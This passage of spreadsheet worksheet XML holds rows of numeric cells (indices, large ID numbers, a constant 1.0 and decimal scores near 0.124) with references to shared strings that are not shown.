      <c r="C28216" s="2" t="s">
        <v>27113</v>
      </c>
      <c r="D28216" s="2">
        <v>1.0</v>
      </c>
      <c r="E28216" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28216" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="28217" ht="15.75" customHeight="1">
      <c r="A28217" s="1">
        <v>16924.0</v>
      </c>
      <c r="B28217" s="2">
        <v>4.8149363E7</v>
      </c>
      <c r="C28217" s="2" t="s">
        <v>27114</v>
      </c>
      <c r="D28217" s="2">
        <v>1.0</v>
      </c>
      <c r="E28217" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28217" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="28218" ht="15.75" customHeight="1">
      <c r="A28218" s="1">
        <v>19750.0</v>
      </c>
      <c r="B28218" s="2">
        <v>5.6704174E7</v>
      </c>
      <c r="C28218" s="2" t="s">
        <v>27115</v>
      </c>
      <c r="D28218" s="2">
        <v>1.0</v>
      </c>
      <c r="E28218" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28218" s="2">
        <v>0.1246438746438746</v>
      </c>
    </row>
    <row r="28219" ht="15.75" customHeight="1">
      <c r="A28219" s="1">
        <v>17025.0</v>
      </c>
      <c r="B28219" s="2">
        <v>4.8459869E7</v>
      </c>
      <c r="C28219" s="2" t="s">
        <v>27116</v>
      </c>
      <c r="D28219" s="2">
        <v>1.0</v>
      </c>
      <c r="E28219" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28219" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="28220" ht="15.75" customHeight="1">
      <c r="A28220" s="1">
        <v>19116.0</v>
      </c>
      <c r="B28220" s="2">
        <v>5.4752633E7</v>
      </c>
      <c r="C28220" s="2" t="s">
        <v>27117</v>
      </c>
      <c r="D28220" s="2">
        <v>1.0</v>
      </c>
      <c r="E28220" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28220" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="28221" ht="15.75" customHeight="1">
      <c r="A28221" s="1">
        <v>33088.0</v>
      </c>
      <c r="B28221" s="2">
        <v>6936556.0</v>
      </c>
      <c r="C28221" s="2" t="s">
        <v>27118</v>
      </c>
      <c r="D28221" s="2">
        <v>1.0</v>
      </c>
      <c r="E28221" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28221" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="28222" ht="15.75" customHeight="1">
      <c r="A28222" s="1">
        <v>6408.0</v>
      </c>
      <c r="B28222" s="2">
        <v>4.8505195E7</v>
      </c>
      <c r="C28222" s="2" t="s">
        <v>27119</v>
      </c>
      <c r="D28222" s="2">
        <v>1.0</v>
      </c>
      <c r="E28222" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28222" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="28223" ht="15.75" customHeight="1">
      <c r="A28223" s="1">
        <v>17947.0</v>
      </c>
      <c r="B28223" s="2">
        <v>5.1251039E7</v>
      </c>
      <c r="C28223" s="2" t="s">
        <v>27120</v>
      </c>
      <c r="D28223" s="2">
        <v>1.0</v>
      </c>
      <c r="E28223" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28223" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="28224" ht="15.75" customHeight="1">
      <c r="A28224" s="1">
        <v>27357.0</v>
      </c>
      <c r="B28224" s="2">
        <v>2.1618618E7</v>
      </c>
      <c r="C28224" s="2" t="s">
        <v>27121</v>
      </c>
      <c r="D28224" s="2">
        <v>1.0</v>
      </c>
      <c r="E28224" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28224" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="28225" ht="15.75" customHeight="1">
      <c r="A28225" s="1">
        <v>24645.0</v>
      </c>
      <c r="B28225" s="2">
        <v>1.1484223E7</v>
      </c>
      <c r="C28225" s="2" t="s">
        <v>27122</v>
      </c>
      <c r="D28225" s="2">
        <v>1.0</v>
      </c>
      <c r="E28225" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28225" s="2">
        <v>0.1242424242424243</v>
      </c>
    </row>
    <row r="28226" ht="15.75" customHeight="1">
      <c r="A28226" s="1">
        <v>9632.0</v>
      </c>
      <c r="B28226" s="2">
        <v>5.6232353E7</v>
      </c>
      <c r="C28226" s="2" t="s">
        <v>27123</v>
      </c>
      <c r="D28226" s="2">
        <v>1.0</v>
      </c>
      <c r="E28226" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28226" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="28227" ht="15.75" customHeight="1">
      <c r="A28227" s="1">
        <v>11073.0</v>
      </c>
      <c r="B28227" s="2">
        <v>1.8393729E7</v>
      </c>
      <c r="C28227" s="2" t="s">
        <v>27124</v>
      </c>
      <c r="D28227" s="2">
        <v>1.0</v>
      </c>
      <c r="E28227" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28227" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="28228" ht="15.75" customHeight="1">
      <c r="A28228" s="1">
        <v>12210.0</v>
      </c>
      <c r="B28228" s="2">
        <v>2.7611101E7</v>
      </c>
      <c r="C28228" s="2" t="s">
        <v>27125</v>
      </c>
      <c r="D28228" s="2">
        <v>1.0</v>
      </c>
      <c r="E28228" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28228" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="28229" ht="15.75" customHeight="1">
      <c r="A28229" s="1">
        <v>16854.0</v>
      </c>
      <c r="B28229" s="2">
        <v>4.7914137E7</v>
      </c>
      <c r="C28229" s="2" t="s">
        <v>27126</v>
      </c>
      <c r="D28229" s="2">
        <v>1.0</v>
      </c>
      <c r="E28229" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28229" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="28230" ht="15.75" customHeight="1">
      <c r="A28230" s="1">
        <v>16944.0</v>
      </c>
      <c r="B28230" s="2">
        <v>4.8213644E7</v>
      </c>
      <c r="C28230" s="2" t="s">
        <v>27127</v>
      </c>
      <c r="D28230" s="2">
        <v>1.0</v>
      </c>
      <c r="E28230" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28230" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="28231" ht="15.75" customHeight="1">
      <c r="A28231" s="1">
        <v>20179.0</v>
      </c>
      <c r="B28231" s="2">
        <v>1.0462109E7</v>
      </c>
      <c r="C28231" s="2" t="s">
        <v>27128</v>
      </c>
      <c r="D28231" s="2">
        <v>1.0</v>
      </c>
      <c r="E28231" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28231" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="28232" ht="15.75" customHeight="1">
      <c r="A28232" s="1">
        <v>25780.0</v>
      </c>
      <c r="B28232" s="2">
        <v>1.4657212E7</v>
      </c>
      <c r="C28232" s="2" t="s">
        <v>27004</v>
      </c>
      <c r="D28232" s="2">
        <v>1.0</v>
      </c>
      <c r="E28232" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28232" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="28233" ht="15.75" customHeight="1">
      <c r="A28233" s="1">
        <v>31234.0</v>
      </c>
      <c r="B28233" s="2">
        <v>4.9276468E7</v>
      </c>
      <c r="C28233" s="2" t="s">
        <v>27129</v>
      </c>
      <c r="D28233" s="2">
        <v>1.0</v>
      </c>
      <c r="E28233" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28233" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="28234" ht="15.75" customHeight="1">
      <c r="A28234" s="1">
        <v>6604.0</v>
      </c>
      <c r="B28234" s="2">
        <v>4.901336E7</v>
      </c>
      <c r="C28234" s="2" t="s">
        <v>27130</v>
      </c>
      <c r="D28234" s="2">
        <v>1.0</v>
      </c>
      <c r="E28234" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28234" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="28235" ht="15.75" customHeight="1">
      <c r="A28235" s="1">
        <v>6641.0</v>
      </c>
      <c r="B28235" s="2">
        <v>4.90738E7</v>
      </c>
      <c r="C28235" s="2" t="s">
        <v>27131</v>
      </c>
      <c r="D28235" s="2">
        <v>1.0</v>
      </c>
      <c r="E28235" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28235" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="28236" ht="15.75" customHeight="1">
      <c r="A28236" s="1">
        <v>14015.0</v>
      </c>
      <c r="B28236" s="2">
        <v>3.7467232E7</v>
      </c>
      <c r="C28236" s="2" t="s">
        <v>27132</v>
      </c>
      <c r="D28236" s="2">
        <v>1.0</v>
      </c>
      <c r="E28236" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28236" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="28237" ht="15.75" customHeight="1">
      <c r="A28237" s="1">
        <v>14804.0</v>
      </c>
      <c r="B28237" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C28237" s="2" t="s">
        <v>27133</v>
      </c>
      <c r="D28237" s="2">
        <v>1.0</v>
      </c>
      <c r="E28237" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28237" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="28238" ht="15.75" customHeight="1">
      <c r="A28238" s="1">
        <v>20194.0</v>
      </c>
      <c r="B28238" s="2">
        <v>1.0541385E7</v>
      </c>
      <c r="C28238" s="2" t="s">
        <v>27134</v>
      </c>
      <c r="D28238" s="2">
        <v>1.0</v>
      </c>
      <c r="E28238" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28238" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="28239" ht="15.75" customHeight="1">
      <c r="A28239" s="1">
        <v>23312.0</v>
      </c>
      <c r="B28239" s="2">
        <v>5.4206939E7</v>
      </c>
      <c r="C28239" s="2" t="s">
        <v>27135</v>
      </c>
      <c r="D28239" s="2">
        <v>1.0</v>
      </c>
      <c r="E28239" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28239" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="28240" ht="15.75" customHeight="1">
      <c r="A28240" s="1">
        <v>23598.0</v>
      </c>
      <c r="B28240" s="2">
        <v>6394175.0</v>
      </c>
      <c r="C28240" s="2" t="s">
        <v>27136</v>
      </c>
      <c r="D28240" s="2">
        <v>1.0</v>
      </c>
      <c r="E28240" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28240" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="28241" ht="15.75" customHeight="1">
      <c r="A28241" s="1">
        <v>4980.0</v>
      </c>
      <c r="B28241" s="2">
        <v>4.4117784E7</v>
      </c>
      <c r="C28241" s="2" t="s">
        <v>27137</v>
      </c>
      <c r="D28241" s="2">
        <v>1.0</v>
      </c>
      <c r="E28241" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28241" s="2">
        <v>0.1238738738738739</v>
      </c>
    </row>
    <row r="28242" ht="15.75" customHeight="1">
      <c r="A28242" s="1">
        <v>3434.0</v>
      </c>
      <c r="B28242" s="2">
        <v>3.8213712E7</v>
      </c>
      <c r="C28242" s="2" t="s">
        <v>27138</v>
      </c>
      <c r="D28242" s="2">
        <v>1.0</v>
      </c>
      <c r="E28242" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28242" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="28243" ht="15.75" customHeight="1">
      <c r="A28243" s="1">
        <v>10322.0</v>
      </c>
      <c r="B28243" s="2">
        <v>5.7705953E7</v>
      </c>
      <c r="C28243" s="2" t="s">
        <v>27139</v>
      </c>
      <c r="D28243" s="2">
        <v>1.0</v>
      </c>
      <c r="E28243" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28243" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="28244" ht="15.75" customHeight="1">
      <c r="A28244" s="1">
        <v>12385.0</v>
      </c>
      <c r="B28244" s="2">
        <v>2.8841007E7</v>
      </c>
      <c r="C28244" s="2" t="s">
        <v>27140</v>
      </c>
      <c r="D28244" s="2">
        <v>1.0</v>
      </c>
      <c r="E28244" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28244" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="28245" ht="15.75" customHeight="1">
      <c r="A28245" s="1">
        <v>18116.0</v>
      </c>
      <c r="B28245" s="2">
        <v>5.1753309E7</v>
      </c>
      <c r="C28245" s="2" t="s">
        <v>27141</v>
      </c>
      <c r="D28245" s="2">
        <v>1.0</v>
      </c>
      <c r="E28245" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28245" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="28246" ht="15.75" customHeight="1">
      <c r="A28246" s="1">
        <v>19828.0</v>
      </c>
      <c r="B28246" s="2">
        <v>5.7047513E7</v>
      </c>
      <c r="C28246" s="2" t="s">
        <v>27142</v>
      </c>
      <c r="D28246" s="2">
        <v>1.0</v>
      </c>
      <c r="E28246" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28246" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="28247" ht="15.75" customHeight="1">
      <c r="A28247" s="1">
        <v>25563.0</v>
      </c>
      <c r="B28247" s="2">
        <v>1.4298529E7</v>
      </c>
      <c r="C28247" s="2" t="s">
        <v>27143</v>
      </c>
      <c r="D28247" s="2">
        <v>1.0</v>
      </c>
      <c r="E28247" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28247" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="28248" ht="15.75" customHeight="1">
      <c r="A28248" s="1">
        <v>27388.0</v>
      </c>
      <c r="B28248" s="2">
        <v>2.1754042E7</v>
      </c>
      <c r="C28248" s="2" t="s">
        <v>27144</v>
      </c>
      <c r="D28248" s="2">
        <v>1.0</v>
      </c>
      <c r="E28248" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28248" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="28249" ht="15.75" customHeight="1">
      <c r="A28249" s="1">
        <v>28290.0</v>
      </c>
      <c r="B28249" s="2">
        <v>2.5564118E7</v>
      </c>
      <c r="C28249" s="2" t="s">
        <v>27145</v>
      </c>
      <c r="D28249" s="2">
        <v>1.0</v>
      </c>
      <c r="E28249" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28249" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="28250" ht="15.75" customHeight="1">
      <c r="A28250" s="1">
        <v>33579.0</v>
      </c>
      <c r="B28250" s="2">
        <v>8298356.0</v>
      </c>
      <c r="C28250" s="2" t="s">
        <v>27146</v>
      </c>
      <c r="D28250" s="2">
        <v>1.0</v>
      </c>
      <c r="E28250" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28250" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="28251" ht="15.75" customHeight="1">
      <c r="A28251" s="1">
        <v>2592.0</v>
      </c>
      <c r="B28251" s="2">
        <v>3.4342802E7</v>
      </c>
      <c r="C28251" s="2" t="s">
        <v>27147</v>
      </c>
      <c r="D28251" s="2">
        <v>1.0</v>
      </c>
      <c r="E28251" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28251" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28252" ht="15.75" customHeight="1">
      <c r="A28252" s="1">
        <v>2663.0</v>
      </c>
      <c r="B28252" s="2">
        <v>3.470721E7</v>
      </c>
      <c r="C28252" s="2" t="s">
        <v>27148</v>
      </c>
      <c r="D28252" s="2">
        <v>1.0</v>
      </c>
      <c r="E28252" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28252" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28253" ht="15.75" customHeight="1">
      <c r="A28253" s="1">
        <v>2853.0</v>
      </c>
      <c r="B28253" s="2">
        <v>3.5509601E7</v>
      </c>
      <c r="C28253" s="2" t="s">
        <v>27149</v>
      </c>
      <c r="D28253" s="2">
        <v>1.0</v>
      </c>
      <c r="E28253" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28253" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28254" ht="15.75" customHeight="1">
      <c r="A28254" s="1">
        <v>6330.0</v>
      </c>
      <c r="B28254" s="2">
        <v>4.8290873E7</v>
      </c>
      <c r="C28254" s="2" t="s">
        <v>27150</v>
      </c>
      <c r="D28254" s="2">
        <v>1.0</v>
      </c>
      <c r="E28254" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28254" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28255" ht="15.75" customHeight="1">
      <c r="A28255" s="1">
        <v>8136.0</v>
      </c>
      <c r="B28255" s="2">
        <v>5.312214E7</v>
      </c>
      <c r="C28255" s="2" t="s">
        <v>27151</v>
      </c>
      <c r="D28255" s="2">
        <v>1.0</v>
      </c>
      <c r="E28255" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28255" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28256" ht="15.75" customHeight="1">
      <c r="A28256" s="1">
        <v>12465.0</v>
      </c>
      <c r="B28256" s="2">
        <v>2.9407284E7</v>
      </c>
      <c r="C28256" s="2" t="s">
        <v>27152</v>
      </c>
      <c r="D28256" s="2">
        <v>1.0</v>
      </c>
      <c r="E28256" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28256" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28257" ht="15.75" customHeight="1">
      <c r="A28257" s="1">
        <v>12688.0</v>
      </c>
      <c r="B28257" s="2">
        <v>3.0706459E7</v>
      </c>
      <c r="C28257" s="2" t="s">
        <v>27153</v>
      </c>
      <c r="D28257" s="2">
        <v>1.0</v>
      </c>
      <c r="E28257" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28257" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28258" ht="15.75" customHeight="1">
      <c r="A28258" s="1">
        <v>13198.0</v>
      </c>
      <c r="B28258" s="2">
        <v>3.4110231E7</v>
      </c>
      <c r="C28258" s="2" t="s">
        <v>27154</v>
      </c>
      <c r="D28258" s="2">
        <v>1.0</v>
      </c>
      <c r="E28258" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28258" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28259" ht="15.75" customHeight="1">
      <c r="A28259" s="1">
        <v>14389.0</v>
      </c>
      <c r="B28259" s="2">
        <v>3.9086537E7</v>
      </c>
      <c r="C28259" s="2" t="s">
        <v>27155</v>
      </c>
      <c r="D28259" s="2">
        <v>1.0</v>
      </c>
      <c r="E28259" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28259" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28260" ht="15.75" customHeight="1">
      <c r="A28260" s="1">
        <v>17788.0</v>
      </c>
      <c r="B28260" s="2">
        <v>5.0789862E7</v>
      </c>
      <c r="C28260" s="2" t="s">
        <v>27156</v>
      </c>
      <c r="D28260" s="2">
        <v>1.0</v>
      </c>
      <c r="E28260" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28260" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28261" ht="15.75" customHeight="1">
      <c r="A28261" s="1">
        <v>19728.0</v>
      </c>
      <c r="B28261" s="2">
        <v>5.6620721E7</v>
      </c>
      <c r="C28261" s="2" t="s">
        <v>27157</v>
      </c>
      <c r="D28261" s="2">
        <v>1.0</v>
      </c>
      <c r="E28261" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28261" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28262" ht="15.75" customHeight="1">
      <c r="A28262" s="1">
        <v>20124.0</v>
      </c>
      <c r="B28262" s="2">
        <v>1.001242E7</v>
      </c>
      <c r="C28262" s="2" t="s">
        <v>27158</v>
      </c>
      <c r="D28262" s="2">
        <v>1.0</v>
      </c>
      <c r="E28262" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28262" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28263" ht="15.75" customHeight="1">
      <c r="A28263" s="1">
        <v>20161.0</v>
      </c>
      <c r="B28263" s="2">
        <v>1.0315289E7</v>
      </c>
      <c r="C28263" s="2" t="s">
        <v>27159</v>
      </c>
      <c r="D28263" s="2">
        <v>1.0</v>
      </c>
      <c r="E28263" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28263" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28264" ht="15.75" customHeight="1">
      <c r="A28264" s="1">
        <v>21412.0</v>
      </c>
      <c r="B28264" s="2">
        <v>2.1982163E7</v>
      </c>
      <c r="C28264" s="2" t="s">
        <v>27160</v>
      </c>
      <c r="D28264" s="2">
        <v>1.0</v>
      </c>
      <c r="E28264" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28264" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28265" ht="15.75" customHeight="1">
      <c r="A28265" s="1">
        <v>22860.0</v>
      </c>
      <c r="B28265" s="2">
        <v>4.7202619E7</v>
      </c>
      <c r="C28265" s="2" t="s">
        <v>27161</v>
      </c>
      <c r="D28265" s="2">
        <v>1.0</v>
      </c>
      <c r="E28265" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28265" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28266" ht="15.75" customHeight="1">
      <c r="A28266" s="1">
        <v>24200.0</v>
      </c>
      <c r="B28266" s="2">
        <v>1.0315288E7</v>
      </c>
      <c r="C28266" s="2" t="s">
        <v>27159</v>
      </c>
      <c r="D28266" s="2">
        <v>1.0</v>
      </c>
      <c r="E28266" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28266" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28267" ht="15.75" customHeight="1">
      <c r="A28267" s="1">
        <v>25160.0</v>
      </c>
      <c r="B28267" s="2">
        <v>1.3065718E7</v>
      </c>
      <c r="C28267" s="2" t="s">
        <v>27162</v>
      </c>
      <c r="D28267" s="2">
        <v>1.0</v>
      </c>
      <c r="E28267" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28267" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28268" ht="15.75" customHeight="1">
      <c r="A28268" s="1">
        <v>25878.0</v>
      </c>
      <c r="B28268" s="2">
        <v>1.4954164E7</v>
      </c>
      <c r="C28268" s="2" t="s">
        <v>17026</v>
      </c>
      <c r="D28268" s="2">
        <v>1.0</v>
      </c>
      <c r="E28268" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28268" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28269" ht="15.75" customHeight="1">
      <c r="A28269" s="1">
        <v>27137.0</v>
      </c>
      <c r="B28269" s="2">
        <v>2.0767128E7</v>
      </c>
      <c r="C28269" s="2" t="s">
        <v>27163</v>
      </c>
      <c r="D28269" s="2">
        <v>1.0</v>
      </c>
      <c r="E28269" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28269" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28270" ht="15.75" customHeight="1">
      <c r="A28270" s="1">
        <v>29254.0</v>
      </c>
      <c r="B28270" s="2">
        <v>3.0907367E7</v>
      </c>
      <c r="C28270" s="2" t="s">
        <v>27164</v>
      </c>
      <c r="D28270" s="2">
        <v>1.0</v>
      </c>
      <c r="E28270" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28270" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28271" ht="15.75" customHeight="1">
      <c r="A28271" s="1">
        <v>29989.0</v>
      </c>
      <c r="B28271" s="2">
        <v>3611413.0</v>
      </c>
      <c r="C28271" s="2" t="s">
        <v>27165</v>
      </c>
      <c r="D28271" s="2">
        <v>1.0</v>
      </c>
      <c r="E28271" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28271" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28272" ht="15.75" customHeight="1">
      <c r="A28272" s="1">
        <v>32716.0</v>
      </c>
      <c r="B28272" s="2">
        <v>5966536.0</v>
      </c>
      <c r="C28272" s="2" t="s">
        <v>27166</v>
      </c>
      <c r="D28272" s="2">
        <v>1.0</v>
      </c>
      <c r="E28272" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28272" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28273" ht="15.75" customHeight="1">
      <c r="A28273" s="1">
        <v>32986.0</v>
      </c>
      <c r="B28273" s="2">
        <v>6603805.0</v>
      </c>
      <c r="C28273" s="2" t="s">
        <v>27167</v>
      </c>
      <c r="D28273" s="2">
        <v>1.0</v>
      </c>
      <c r="E28273" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28273" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28274" ht="15.75" customHeight="1">
      <c r="A28274" s="1">
        <v>33078.0</v>
      </c>
      <c r="B28274" s="2">
        <v>6904772.0</v>
      </c>
      <c r="C28274" s="2" t="s">
        <v>27168</v>
      </c>
      <c r="D28274" s="2">
        <v>1.0</v>
      </c>
      <c r="E28274" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28274" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28275" ht="15.75" customHeight="1">
      <c r="A28275" s="1">
        <v>33180.0</v>
      </c>
      <c r="B28275" s="2">
        <v>7107467.0</v>
      </c>
      <c r="C28275" s="2" t="s">
        <v>27169</v>
      </c>
      <c r="D28275" s="2">
        <v>1.0</v>
      </c>
      <c r="E28275" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28275" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="28276" ht="15.75" customHeight="1">
      <c r="A28276" s="1">
        <v>31975.0</v>
      </c>
      <c r="B28276" s="2">
        <v>5316476.0</v>
      </c>
      <c r="C28276" s="2" t="s">
        <v>27170</v>
      </c>
      <c r="D28276" s="2">
        <v>1.0</v>
      </c>
      <c r="E28276" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28276" s="2">
        <v>0.1235380116959065</v>
      </c>
    </row>
    <row r="28277" ht="15.75" customHeight="1">
      <c r="A28277" s="1">
        <v>18260.0</v>
      </c>
      <c r="B28277" s="2">
        <v>5.2188236E7</v>
      </c>
      <c r="C28277" s="2" t="s">
        <v>27171</v>
      </c>
      <c r="D28277" s="2">
        <v>1.0</v>
      </c>
      <c r="E28277" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28277" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="28278" ht="15.75" customHeight="1">
      <c r="A28278" s="1">
        <v>31887.0</v>
      </c>
      <c r="B28278" s="2">
        <v>5286976.0</v>
      </c>
      <c r="C28278" s="2" t="s">
        <v>27172</v>
      </c>
      <c r="D28278" s="2">
        <v>1.0</v>
      </c>
      <c r="E28278" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28278" s="2">
        <v>0.1231481481481482</v>
      </c>
    </row>
    <row r="28279" ht="15.75" customHeight="1">
      <c r="A28279" s="1">
        <v>10121.0</v>
      </c>
      <c r="B28279" s="2">
        <v>5.7253853E7</v>
      </c>
      <c r="C28279" s="2" t="s">
        <v>27173</v>
      </c>
      <c r="D28279" s="2">
        <v>1.0</v>
      </c>
      <c r="E28279" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28279" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="28280" ht="15.75" customHeight="1">
      <c r="A28280" s="1">
        <v>11193.0</v>
      </c>
      <c r="B28280" s="2">
        <v>1.9868223E7</v>
      </c>
      <c r="C28280" s="2" t="s">
        <v>27174</v>
      </c>
      <c r="D28280" s="2">
        <v>1.0</v>
      </c>
      <c r="E28280" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28280" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="28281" ht="15.75" customHeight="1">
      <c r="A28281" s="1">
        <v>18572.0</v>
      </c>
      <c r="B28281" s="2">
        <v>5.3215766E7</v>
      </c>
      <c r="C28281" s="2" t="s">
        <v>27175</v>
      </c>
      <c r="D28281" s="2">
        <v>1.0</v>
      </c>
      <c r="E28281" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28281" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="28282" ht="15.75" customHeight="1">
      <c r="A28282" s="1">
        <v>15073.0</v>
      </c>
      <c r="B28282" s="2">
        <v>4.1728167E7</v>
      </c>
      <c r="C28282" s="2" t="s">
        <v>27176</v>
      </c>
      <c r="D28282" s="2">
        <v>1.0</v>
      </c>
      <c r="E28282" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28282" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="28283" ht="15.75" customHeight="1">
      <c r="A28283" s="1">
        <v>16455.0</v>
      </c>
      <c r="B28283" s="2">
        <v>4.6441311E7</v>
      </c>
